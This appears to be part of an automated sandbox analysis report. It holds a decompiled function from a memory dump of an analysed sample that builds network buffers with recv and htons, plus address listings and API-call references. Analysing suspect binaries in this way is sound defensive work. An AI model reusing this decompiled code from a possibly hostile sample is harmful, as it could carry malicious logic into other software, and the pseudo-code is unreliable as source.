                                                                                                                                                  				intOrPtr _t218;
                                                                                                                                                  				intOrPtr _t219;
                                                                                                                                                  				intOrPtr _t220;
                                                                                                                                                  				void* _t227;
                                                                                                                                                  				void _t231;
                                                                                                                                                  				intOrPtr _t234;
                                                                                                                                                  				intOrPtr _t235;
                                                                                                                                                  				intOrPtr _t238;
                                                                                                                                                  				intOrPtr _t240;
                                                                                                                                                  				intOrPtr _t241;
                                                                                                                                                  				intOrPtr _t243;
                                                                                                                                                  				intOrPtr _t244;
                                                                                                                                                  				intOrPtr _t245;
                                                                                                                                                  				void* _t247;
                                                                                                                                                  				signed short _t249;
                                                                                                                                                  				signed int _t251;
                                                                                                                                                  				intOrPtr _t254;
                                                                                                                                                  				signed int _t255;
                                                                                                                                                  				signed short _t257;
                                                                                                                                                  				void* _t258;
                                                                                                                                                  				void* _t261;
                                                                                                                                                  				void* _t262;
                                                                                                                                                  				void* _t264;
                                                                                                                                                  				void* _t265;
                                                                                                                                                  				void* _t266;
                                                                                                                                                  				void* _t268;
                                                                                                                                                  				intOrPtr* _t277;
                                                                                                                                                  				void* _t278;
                                                                                                                                                  				intOrPtr* _t279;
                                                                                                                                                  				void* _t303;
                                                                                                                                                  				signed short _t305;
                                                                                                                                                  
                                                                                                                                                  				_t268 = __edx;
                                                                                                                                                  				_t247 = __ecx;
                                                                                                                                                  				_v5 = 0;
                                                                                                                                                  				_t303 = HeapAlloc(GetProcessHeap(), 8, 0x100);
                                                                                                                                                  				_v12 = _t303;
                                                                                                                                                  				if(_t303 == 0) {
                                                                                                                                                  					L36:
                                                                                                                                                  					return _v5;
                                                                                                                                                  				}
                                                                                                                                                  				_t277 = _a16;
                                                                                                                                                  				 *((char*)(_t303 + 2)) = 1;
                                                                                                                                                  				asm("cdq");
                                                                                                                                                  				asm("adc edx, [ebx+0x14]");
                                                                                                                                                  				if(E047740E3( *_t277, _t247, _a4,  *_a8, ( *( *_t277 + 0x5d) & 0x000000ff) +  *((intOrPtr*)( *_t277 + 0x10)), _t268, _t303, 2) == 0) {
                                                                                                                                                  					L35:
                                                                                                                                                  					HeapFree(GetProcessHeap(), 8, _t303);
                                                                                                                                                  					goto L36;
                                                                                                                                                  				}
                                                                                                                                                  				_v16 = _v16 & 0x00000000;
                                                                                                                                                  				if(E04773D0D(_t247, _t268, _a4, _a8, _a12,  *((intOrPtr*)( *_t277 + 0x10)),  *((intOrPtr*)( *_t277 + 0x14)),  &_v16, 0x100, _t277) == 0) {
                                                                                                                                                  					goto L35;
                                                                                                                                                  				}
                                                                                                                                                  				_t178 =  *( *_t277 + 0x5c) & 0x000000ff;
                                                                                                                                                  				_t248 = _v16;
                                                                                                                                                  				_t231 =  *(_t248 + _t178);
                                                                                                                                                  				_v24 =  *((intOrPtr*)(_t178 + _t248 + 4));
                                                                                                                                                  				HeapFree(GetProcessHeap(), 8, _t248);
                                                                                                                                                  				_t182 =  *_t277;
                                                                                                                                                  				if( *((char*)(_t182 + 0x66)) == 0) {
                                                                                                                                                  					_t249 =  *(_t182 + 0x64) & 0x000000ff;
                                                                                                                                                  					_a12 = _t249;
                                                                                                                                                  					if(0 >= _t249) {
                                                                                                                                                  						L40:
                                                                                                                                                  						if(E047740E3(_t182, _a8, _a4,  *_a8, _t231, _v24, _t303, _a12) != 0) {
                                                                                                                                                  							_v5 = 1;
                                                                                                                                                  						}
                                                                                                                                                  						goto L35;
                                                                                                                                                  					}
                                                                                                                                                  					_t278 = 0;
                                                                                                                                                  					_t251 = _t249 & 0x0000ffff;
                                                                                                                                                  					do {
                                                                                                                                                  						 *(_t278 + _t303 + 1) =  !( *(_t278 +  *((intOrPtr*)(_t182 + 0x60))));
                                                                                                                                                  						_t278 = _t278 + 1;
                                                                                                                                                  						_t251 = _t251 - 1;
                                                                                                                                                  					} while (_t251 != 0);
                                                                                                                                                  					goto L40;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t184 =  *((intOrPtr*)(_t182 + 0x65));
                                                                                                                                                  					if( *((intOrPtr*)(_t182 + 0x65)) != 0) {
                                                                                                                                                  						asm("cdq");
                                                                                                                                                  						asm("adc edx, [ebp-0x14]");
                                                                                                                                                  						_t248 =  &_v16;
                                                                                                                                                  						if(E04773D0D( &_v16, _t268, _a4, _a8, _a12, (_t184 & 0x000000ff) + _t231, _t268,  &_v16, 8, _t277) == 0) {
                                                                                                                                                  							_t231 = 0;
                                                                                                                                                  							_v24 = 0;
                                                                                                                                                  						} else {
                                                                                                                                                  							_t227 = _v16;
                                                                                                                                                  							_t248 =  *(_t227 + 4);
                                                                                                                                                  							_t231 =  *_t227;
                                                                                                                                                  							_v24 =  *(_t227 + 4);
                                                                                                                                                  							HeapFree(GetProcessHeap(), 8, _t227);
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					if(_t231 != 0 || _v24 != _t231) {
                                                                                                                                                  						asm("cdq");
                                                                                                                                                  						asm("adc edx, [ebp-0x14]");
                                                                                                                                                  						if(E04773D0D(_t248, _t268, _a4, _a8, _a12, ( *( *_t277 + 0x66) & 0x000000ff) + _t231, _t268,  &_v16, 8, _t277) == 0) {
                                                                                                                                                  							goto L35;
                                                                                                                                                  						}
                                                                                                                                                  						_t190 = _v16;
                                                                                                                                                  						_t233 =  *_t190;
                                                                                                                                                  						_v36 =  *_t190;
                                                                                                                                                  						_v32 =  *((intOrPtr*)(_t190 + 4));
                                                                                                                                                  						HeapFree(GetProcessHeap(), 8, _t190);
                                                                                                                                                  						_t253 =  *_t277;
                                                                                                                                                  						_t193 = 0x100;
                                                                                                                                                  						if(0 ==  *((intOrPtr*)( *_t277))) {
                                                                                                                                                  							_t193 = 0x200;
                                                                                                                                                  						}
                                                                                                                                                  						if(E04773D0D(_t253, 0, _a4, _a8, _a12, _t233, _v32,  &_v16, _t193, _t277) == 0) {
                                                                                                                                                  							goto L35;
                                                                                                                                                  						} else {
                                                                                                                                                  							_t254 =  *_t277;
                                                                                                                                                  							_t196 = _v16;
                                                                                                                                                  							_t255 =  *(_t254 + 0x68) & 0x000000ff;
                                                                                                                                                  							_t234 =  *((intOrPtr*)(_t196 + _t255));
                                                                                                                                                  							_a12 =  *(_t196 + ( *(_t254 + 0x67) & 0x000000ff));
                                                                                                                                                  							_v28 = _t234;
                                                                                                                                                  							_v24 =  *((intOrPtr*)(_t255 + _t196 + 4));
                                                                                                                                                  							HeapFree(GetProcessHeap(), 8, _t196);
                                                                                                                                                  							memset(_t303, 0, 0x100);
                                                                                                                                                  							if(_a12 == 0) {
                                                                                                                                                  								goto L35;
                                                                                                                                                  							}
                                                                                                                                                  							_t279 =  *_t277;
                                                                                                                                                  							_t257 = _a12;
                                                                                                                                                  							_v16 = _t279;
                                                                                                                                                  							if(1 !=  *_t279) {
                                                                                                                                                  								_t258 = _t257 - 1;
                                                                                                                                                  								if(_t258 == 0) {
                                                                                                                                                  									_a12 = 1;
                                                                                                                                                  									_t235 = _t234 + 0x10;
                                                                                                                                                  									asm("adc eax, edx");
                                                                                                                                                  									 *(_t303 + 5) = _v24;
                                                                                                                                                  									_push(0x1c);
                                                                                                                                                  									L30:
                                                                                                                                                  									 *((intOrPtr*)(_t303 + 1)) = _t235;
                                                                                                                                                  									L31:
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									_pop(_t305);
                                                                                                                                                  									_t281 = _a8;
                                                                                                                                                  									_t260 = _a12;
                                                                                                                                                  									 *((_t305 & 0x0000ffff) + _v12 + 1 + 4) = _a12;
                                                                                                                                                  									asm("cdq");
                                                                                                                                                  									asm("adc edx, [ebp-0x1c]");
                                                                                                                                                  									if(E047740E3(_v16, _a12, _a4,  *_a8, ( *(_v16 + 0x67) & 0x000000ff) + _v36, 0, (_t305 & 0x0000ffff) + _v12 + 1 + 3, 4) != 0 && E047740E3( *_a16, _t260, _a4,  *_t281, _v28, _v24, _v12, _t305) != 0) {
                                                                                                                                                  										_v5 = 1;
                                                                                                                                                  									}
                                                                                                                                                  									_t303 = _v12;
                                                                                                                                                  									goto L35;
                                                                                                                                                  								}
                                                                                                                                                  								_t261 = _t258 - 1;
                                                                                                                                                  								_t211 = _t234;
                                                                                                                                                  								if(_t261 == 0) {
                                                                                                                                                  									_t262 = _v24;
                                                                                                                                                  									_t212 = _t211 + 0x20;
                                                                                                                                                  									 *((intOrPtr*)(_t303 + 1)) = _t212;
                                                                                                                                                  									asm("adc ecx, edx");
                                                                                                                                                  									 *(_t303 + 5) = _t262;
                                                                                                                                                  									 *((intOrPtr*)(_t303 + 0x11)) = _t212 + 0xc;
                                                                                                                                                  									 *((char*)(_t303 + 0x19)) = 0xe;
                                                                                                                                                  									asm("adc ecx, edx");
                                                                                                                                                  									 *(_t303 + 0x15) = _t262;
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									_a12 = 2;
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									_push(0x3c);
                                                                                                                                                  								} else {
                                                                                                                                                  									_t264 = _v24;
                                                                                                                                                  									if(_t261 == 1) {
                                                                                                                                                  										_t214 = _t211 + 0x30;
                                                                                                                                                  										 *((intOrPtr*)(_t303 + 1)) = _t214;
                                                                                                                                                  										asm("adc ecx, edx");
                                                                                                                                                  										 *(_t303 + 5) = _t264;
                                                                                                                                                  										 *((char*)(_t303 + 0x19)) = 0xe;
                                                                                                                                                  										_t215 = _t214 + 0xc;
                                                                                                                                                  										 *((intOrPtr*)(_t303 + 0x11)) = _t215;
                                                                                                                                                  										asm("adc ecx, edx");
                                                                                                                                                  										 *(_t303 + 0x15) = _t264;
                                                                                                                                                  										 *((char*)(_t303 + 0x29)) = 7;
                                                                                                                                                  										 *((intOrPtr*)(_t303 + 0x21)) = _t215 + 0x10;
                                                                                                                                                  										asm("adc ecx, edx");
                                                                                                                                                  										 *(_t303 + 0x25) = _t264;
                                                                                                                                                  										asm("movsd");
                                                                                                                                                  										asm("movsd");
                                                                                                                                                  										asm("movsd");
                                                                                                                                                  										asm("movsd");
                                                                                                                                                  										asm("movsd");
                                                                                                                                                  										asm("movsd");
                                                                                                                                                  										asm("movsd");
                                                                                                                                                  										_a12 = 3;
                                                                                                                                                  										_push(0x58);
                                                                                                                                                  									} else {
                                                                                                                                                  										_t218 = _t211 + 0x40;
                                                                                                                                                  										 *((intOrPtr*)(_t303 + 1)) = _t218;
                                                                                                                                                  										asm("adc ecx, edx");
                                                                                                                                                  										 *(_t303 + 5) = _t264;
                                                                                                                                                  										 *((char*)(_t303 + 0x19)) = 0xe;
                                                                                                                                                  										_t219 = _t218 + 0xc;
                                                                                                                                                  										 *((intOrPtr*)(_t303 + 0x11)) = _t219;
                                                                                                                                                  										asm("adc ecx, edx");
                                                                                                                                                  										 *(_t303 + 0x15) = _t264;
                                                                                                                                                  										 *((char*)(_t303 + 0x29)) = 7;
                                                                                                                                                  										_t220 = _t219 + 0x10;
                                                                                                                                                  										 *((intOrPtr*)(_t303 + 0x21)) = _t220;
                                                                                                                                                  										asm("adc ecx, edx");
                                                                                                                                                  										 *(_t303 + 0x25) = _t264;
                                                                                                                                                  										 *((char*)(_t303 + 0x39)) = 7;
                                                                                                                                                  										 *((intOrPtr*)(_t303 + 0x31)) = _t220 + 0xc;
                                                                                                                                                  										asm("adc ecx, edx");
                                                                                                                                                  										 *(_t303 + 0x35) = _t264;
                                                                                                                                                  										asm("movsd");
                                                                                                                                                  										asm("movsd");
                                                                                                                                                  										asm("movsd");
                                                                                                                                                  										asm("movsd");
                                                                                                                                                  										asm("movsd");
                                                                                                                                                  										asm("movsd");
                                                                                                                                                  										asm("movsd");
                                                                                                                                                  										asm("movsd");
                                                                                                                                                  										asm("movsd");
                                                                                                                                                  										asm("movsd");
                                                                                                                                                  										_a12 = 4;
                                                                                                                                                  										_push(0x74);
                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  								goto L31;
                                                                                                                                                  							}
                                                                                                                                                  							_t265 = _t257 - 1;
                                                                                                                                                  							if(_t265 == 0) {
                                                                                                                                                  								_a12 = 1;
                                                                                                                                                  								_t235 = _t234 + 8;
                                                                                                                                                  								_push(0x14);
                                                                                                                                                  								goto L30;
                                                                                                                                                  							}
                                                                                                                                                  							_t266 = _t265 - 1;
                                                                                                                                                  							if(_t266 == 0) {
                                                                                                                                                  								_t238 = _t234 + 0x10;
                                                                                                                                                  								 *((intOrPtr*)(_t303 + 1)) = _t238;
                                                                                                                                                  								 *((char*)(_t303 + 0xd)) = 0xe;
                                                                                                                                                  								 *((intOrPtr*)(_t303 + 9)) = _t238 + 0xc;
                                                                                                                                                  								asm("movsd");
                                                                                                                                                  								asm("movsd");
                                                                                                                                                  								asm("movsd");
                                                                                                                                                  								_a12 = 2;
                                                                                                                                                  								asm("movsd");
                                                                                                                                                  								_push(0x2c);
                                                                                                                                                  							} else {
                                                                                                                                                  								if(_t266 == 1) {
                                                                                                                                                  									_t240 = _t234 + 0x18;
                                                                                                                                                  									 *((intOrPtr*)(_t303 + 1)) = _t240;
                                                                                                                                                  									 *((char*)(_t303 + 0xd)) = 0xe;
                                                                                                                                                  									_t241 = _t240 + 0xc;
                                                                                                                                                  									 *((intOrPtr*)(_t303 + 9)) = _t241;
                                                                                                                                                  									 *(_t303 + 0x15) = 7;
                                                                                                                                                  									 *((intOrPtr*)(_t303 + 0x11)) = _t241 + 0x10;
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									_a12 = 3;
                                                                                                                                                  									_push(0x40);
                                                                                                                                                  								} else {
                                                                                                                                                  									_t243 = _t234 + 0x20;
                                                                                                                                                  									 *((intOrPtr*)(_t303 + 1)) = _t243;
                                                                                                                                                  									 *((char*)(_t303 + 0xd)) = 0xe;
                                                                                                                                                  									_t244 = _t243 + 0xc;
                                                                                                                                                  									 *((intOrPtr*)(_t303 + 9)) = _t244;
                                                                                                                                                  									 *(_t303 + 0x15) = 7;
                                                                                                                                                  									_t245 = _t244 + 0x10;
                                                                                                                                                  									 *((intOrPtr*)(_t303 + 0x11)) = _t245;
                                                                                                                                                  									 *((char*)(_t303 + 0x1d)) = 7;
                                                                                                                                                  									 *((intOrPtr*)(_t303 + 0x19)) = _t245 + 0xc;
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									asm("movsd");
                                                                                                                                                  									_a12 = 4;
                                                                                                                                                  									_push(0x54);
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  							goto L31;
                                                                                                                                                  						}
                                                                                                                                                  					} else {
                                                                                                                                                  						goto L35;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  			}



















































                                                                                                                                                  0x047741e9
                                                                                                                                                  0x047741e9
                                                                                                                                                  0x047741f9
                                                                                                                                                  0x0477420a
                                                                                                                                                  0x0477420c
                                                                                                                                                  0x04774211
                                                                                                                                                  0x04774679
                                                                                                                                                  0x04774680
                                                                                                                                                  0x04774680
                                                                                                                                                  0x04774217
                                                                                                                                                  0x0477421c
                                                                                                                                                  0x04774224
                                                                                                                                                  0x0477422a
                                                                                                                                                  0x0477423f
                                                                                                                                                  0x04774669
                                                                                                                                                  0x04774673
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04774673
                                                                                                                                                  0x04774245
                                                                                                                                                  0x0477426b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04774273
                                                                                                                                                  0x04774277
                                                                                                                                                  0x0477427a
                                                                                                                                                  0x04774284
                                                                                                                                                  0x0477428e
                                                                                                                                                  0x04774294
                                                                                                                                                  0x0477429a
                                                                                                                                                  0x04774683
                                                                                                                                                  0x04774689
                                                                                                                                                  0x0477468f
                                                                                                                                                  0x047746a6
                                                                                                                                                  0x047746bf
                                                                                                                                                  0x047746c1
                                                                                                                                                  0x047746c1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047746bf
                                                                                                                                                  0x04774691
                                                                                                                                                  0x04774693
                                                                                                                                                  0x04774696
                                                                                                                                                  0x0477469e
                                                                                                                                                  0x047746a2
                                                                                                                                                  0x047746a3
                                                                                                                                                  0x047746a3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047742a0
                                                                                                                                                  0x047742a0
                                                                                                                                                  0x047742a5
                                                                                                                                                  0x047742ad
                                                                                                                                                  0x047742b0
                                                                                                                                                  0x047742b3
                                                                                                                                                  0x047742c9
                                                                                                                                                  0x047742e8
                                                                                                                                                  0x047742ea
                                                                                                                                                  0x047742cb
                                                                                                                                                  0x047742cb
                                                                                                                                                  0x047742ce
                                                                                                                                                  0x047742d1
                                                                                                                                                  0x047742d6
                                                                                                                                                  0x047742e0
                                                                                                                                                  0x047742e0
                                                                                                                                                  0x047742c9
                                                                                                                                                  0x047742ef
                                                                                                                                                  0x04774307
                                                                                                                                                  0x0477430a
                                                                                                                                                  0x0477431f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04774325
                                                                                                                                                  0x04774328
                                                                                                                                                  0x04774330
                                                                                                                                                  0x04774333
                                                                                                                                                  0x0477433d
                                                                                                                                                  0x04774343
                                                                                                                                                  0x04774347
                                                                                                                                                  0x0477434f
                                                                                                                                                  0x04774351
                                                                                                                                                  0x04774351
                                                                                                                                                  0x04774370
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04774376
                                                                                                                                                  0x04774376
                                                                                                                                                  0x0477437c
                                                                                                                                                  0x0477437f
                                                                                                                                                  0x04774383
                                                                                                                                                  0x04774390
                                                                                                                                                  0x04774393
                                                                                                                                                  0x04774396
                                                                                                                                                  0x047743a0
                                                                                                                                                  0x047743ae
                                                                                                                                                  0x047743bb
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047743c1
                                                                                                                                                  0x047743c3
                                                                                                                                                  0x047743c9
                                                                                                                                                  0x047743cf
                                                                                                                                                  0x047744d1
                                                                                                                                                  0x047744d2
                                                                                                                                                  0x047745ef
                                                                                                                                                  0x047745f5
                                                                                                                                                  0x047745f8
                                                                                                                                                  0x047745fa
                                                                                                                                                  0x04774600
                                                                                                                                                  0x04774602
                                                                                                                                                  0x04774602
                                                                                                                                                  0x0477460a
                                                                                                                                                  0x04774610
                                                                                                                                                  0x04774611
                                                                                                                                                  0x04774612
                                                                                                                                                  0x04774613
                                                                                                                                                  0x04774614
                                                                                                                                                  0x0477461e
                                                                                                                                                  0x04774621
                                                                                                                                                  0x0477462e
                                                                                                                                                  0x04774632
                                                                                                                                                  0x04774643
                                                                                                                                                  0x04774662
                                                                                                                                                  0x04774662
                                                                                                                                                  0x04774666
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04774666
                                                                                                                                                  0x047744d8
                                                                                                                                                  0x047744d9
                                                                                                                                                  0x047744db
                                                                                                                                                  0x047745b0
                                                                                                                                                  0x047745b3
                                                                                                                                                  0x047745b6
                                                                                                                                                  0x047745b9
                                                                                                                                                  0x047745bb
                                                                                                                                                  0x047745c1
                                                                                                                                                  0x047745c4
                                                                                                                                                  0x047745cb
                                                                                                                                                  0x047745cd
                                                                                                                                                  0x047745d5
                                                                                                                                                  0x047745d6
                                                                                                                                                  0x047745d7
                                                                                                                                                  0x047745e3
                                                                                                                                                  0x047745ea
                                                                                                                                                  0x047745eb
                                                                                                                                                  0x047744e1
                                                                                                                                                  0x047744e2
                                                                                                                                                  0x047744e5
                                                                                                                                                  0x0477455a
                                                                                                                                                  0x0477455d
                                                                                                                                                  0x04774560
                                                                                                                                                  0x04774562
                                                                                                                                                  0x04774565
                                                                                                                                                  0x04774569
                                                                                                                                                  0x0477456c
                                                                                                                                                  0x04774572
                                                                                                                                                  0x04774574
                                                                                                                                                  0x04774577
                                                                                                                                                  0x0477457e
                                                                                                                                                  0x04774584
                                                                                                                                                  0x04774586
                                                                                                                                                  0x0477458e
                                                                                                                                                  0x0477458f
                                                                                                                                                  0x04774590
                                                                                                                                                  0x04774599
                                                                                                                                                  0x0477459a
                                                                                                                                                  0x0477459b
                                                                                                                                                  0x0477459c
                                                                                                                                                  0x0477459d
                                                                                                                                                  0x047745ac
                                                                                                                                                  0x047744e7
                                                                                                                                                  0x047744e7
                                                                                                                                                  0x047744ea
                                                                                                                                                  0x047744ed
                                                                                                                                                  0x047744ef
                                                                                                                                                  0x047744f2
                                                                                                                                                  0x047744f6
                                                                                                                                                  0x047744f9
                                                                                                                                                  0x047744ff
                                                                                                                                                  0x04774501
                                                                                                                                                  0x04774504
                                                                                                                                                  0x04774508
                                                                                                                                                  0x0477450b
                                                                                                                                                  0x0477450e
                                                                                                                                                  0x04774510
                                                                                                                                                  0x04774513
                                                                                                                                                  0x0477451a
                                                                                                                                                  0x04774520
                                                                                                                                                  0x04774522
                                                                                                                                                  0x0477452a
                                                                                                                                                  0x0477452b
                                                                                                                                                  0x0477452c
                                                                                                                                                  0x04774535
                                                                                                                                                  0x04774536
                                                                                                                                                  0x04774537
                                                                                                                                                  0x04774538
                                                                                                                                                  0x04774541
                                                                                                                                                  0x04774542
                                                                                                                                                  0x04774543
                                                                                                                                                  0x04774544
                                                                                                                                                  0x04774553
                                                                                                                                                  0x04774553
                                                                                                                                                  0x047744e5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047744db
                                                                                                                                                  0x047743d5
                                                                                                                                                  0x047743d6
                                                                                                                                                  0x047744c1
                                                                                                                                                  0x047744c4
                                                                                                                                                  0x047744ca
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047744ca
                                                                                                                                                  0x047743dc
                                                                                                                                                  0x047743dd
                                                                                                                                                  0x0477448c
                                                                                                                                                  0x0477448f
                                                                                                                                                  0x04774492
                                                                                                                                                  0x0477449c
                                                                                                                                                  0x047744a4
                                                                                                                                                  0x047744a5
                                                                                                                                                  0x047744a6
                                                                                                                                                  0x047744b2
                                                                                                                                                  0x047744b9
                                                                                                                                                  0x047744ba
                                                                                                                                                  0x047743e3
                                                                                                                                                  0x047743e7
                                                                                                                                                  0x04774445
                                                                                                                                                  0x04774448
                                                                                                                                                  0x0477444b
                                                                                                                                                  0x04774452
                                                                                                                                                  0x04774455
                                                                                                                                                  0x04774458
                                                                                                                                                  0x0477445f
                                                                                                                                                  0x04774467
                                                                                                                                                  0x04774468
                                                                                                                                                  0x04774469
                                                                                                                                                  0x04774472
                                                                                                                                                  0x04774473
                                                                                                                                                  0x04774474
                                                                                                                                                  0x04774475
                                                                                                                                                  0x04774476
                                                                                                                                                  0x04774485
                                                                                                                                                  0x047743e9
                                                                                                                                                  0x047743e9
                                                                                                                                                  0x047743ec
                                                                                                                                                  0x047743ef
                                                                                                                                                  0x047743f6
                                                                                                                                                  0x047743f9
                                                                                                                                                  0x047743fc
                                                                                                                                                  0x04774400
                                                                                                                                                  0x04774403
                                                                                                                                                  0x04774406
                                                                                                                                                  0x0477440d
                                                                                                                                                  0x04774415
                                                                                                                                                  0x04774416
                                                                                                                                                  0x04774417
                                                                                                                                                  0x04774420
                                                                                                                                                  0x04774421
                                                                                                                                                  0x04774422
                                                                                                                                                  0x04774423
                                                                                                                                                  0x0477442c
                                                                                                                                                  0x0477442d
                                                                                                                                                  0x0477442e
                                                                                                                                                  0x0477442f
                                                                                                                                                  0x0477443e
                                                                                                                                                  0x0477443e
                                                                                                                                                  0x047743e7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047743dd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047742ef

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000100,00000000,?,74CB4F20), ref: 047741FD
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 04774204
                                                                                                                                                    • Part of subcall function 047740E3: GetProcessHeap.KERNEL32(00000008,00000027,?,00000000,?,?,?,0477423D,?,?,?,?,00000000,00000002), ref: 047740F8
                                                                                                                                                    • Part of subcall function 047740E3: HeapAlloc.KERNEL32(00000000,?,?,?,0477423D,?,?,?,?,00000000,00000002), ref: 047740FB
                                                                                                                                                    • Part of subcall function 047740E3: GetProcessHeap.KERNEL32(00000008,00000009,?,?,?,0477423D,?,?,?,?,00000000,00000002), ref: 04774148
                                                                                                                                                    • Part of subcall function 047740E3: HeapAlloc.KERNEL32(00000000,?,?,?,0477423D,?,?,?,?,00000000,00000002), ref: 0477414B
                                                                                                                                                    • Part of subcall function 047740E3: Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,0477423D,?,?,?,?,00000000), ref: 04774184
                                                                                                                                                    • Part of subcall function 047740E3: Sleep.KERNEL32(000007D0,00000000,?,?,00000000,?,0477423E,?,?,?,0477423D,?,?,?,?,00000000), ref: 047741BC
                                                                                                                                                    • Part of subcall function 047740E3: GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,00000000,00000000,?,?,?,?,0477423D,?,?,?,?), ref: 047741CB
                                                                                                                                                    • Part of subcall function 047740E3: HeapFree.KERNEL32(00000000,?,?,?,0477423D,?,?,?,?,00000000,00000002), ref: 047741CE
                                                                                                                                                    • Part of subcall function 047740E3: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,0477423D,?,?,?,?,00000000,00000002), ref: 047741D7
                                                                                                                                                    • Part of subcall function 047740E3: HeapFree.KERNEL32(00000000,?,?,?,0477423D,?,?,?,?,00000000,00000002), ref: 047741DA
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,?,?,00000000,00000100,?,?,?,?,?,00000000,00000002), ref: 04774287
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0477428E
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,?,?,00000000,00000008,?), ref: 047742D9
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 047742E0
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,?,?,00000000,00000008,?), ref: 04774336
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 0477433D
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,74CB4F20,?,00000000,00000100,?), ref: 04774399
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 047743A0
                                                                                                                                                  • memset.MSVCRT ref: 047743AE
                                                                                                                                                    • Part of subcall function 04773D0D: rand.MSVCRT ref: 04773EC3
                                                                                                                                                    • Part of subcall function 04773D0D: memset.MSVCRT ref: 04773EFC
                                                                                                                                                    • Part of subcall function 04773D0D: recv.WS2_32(00000000,00000000,0000FFFF,00000000), ref: 04773F38
                                                                                                                                                    • Part of subcall function 04773D0D: htons.WS2_32(?), ref: 04773F5C
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,00000000,00000002), ref: 0477466C
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 04774673
                                                                                                                                                    • Part of subcall function 04773D0D: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,74CB4F20,?,?,?,04774269,?,00000000,?,?,?,00000000,00000100,?), ref: 04773D2B
                                                                                                                                                    • Part of subcall function 04773D0D: HeapAlloc.KERNEL32(00000000,?,?,?,04774269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04773D34
                                                                                                                                                    • Part of subcall function 04773D0D: GetProcessHeap.KERNEL32(00000008,00000027,00000000,?,?,?,04774269,?,00000000,?,?,?,00000000,00000100,?,?), ref: 04773D46
                                                                                                                                                    • Part of subcall function 04773D0D: HeapAlloc.KERNEL32(00000000,?,?,?,04774269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04773D49
                                                                                                                                                    • Part of subcall function 04773D0D: GetProcessHeap.KERNEL32(00000008,0000003D,?,?,?,04774269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 04773D63
                                                                                                                                                    • Part of subcall function 04773D0D: HeapAlloc.KERNEL32(00000000,?,?,?,04774269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04773D66
                                                                                                                                                    • Part of subcall function 04773D0D: Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,04774269,?,00000000,?,?,?), ref: 04773E5B
                                                                                                                                                    • Part of subcall function 04773D0D: GetProcessHeap.KERNEL32(00000008,00000029,?,?,?,04774269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 04773E65
                                                                                                                                                    • Part of subcall function 04773D0D: HeapAlloc.KERNEL32(00000000,?,?,?,04774269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 04773E68
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
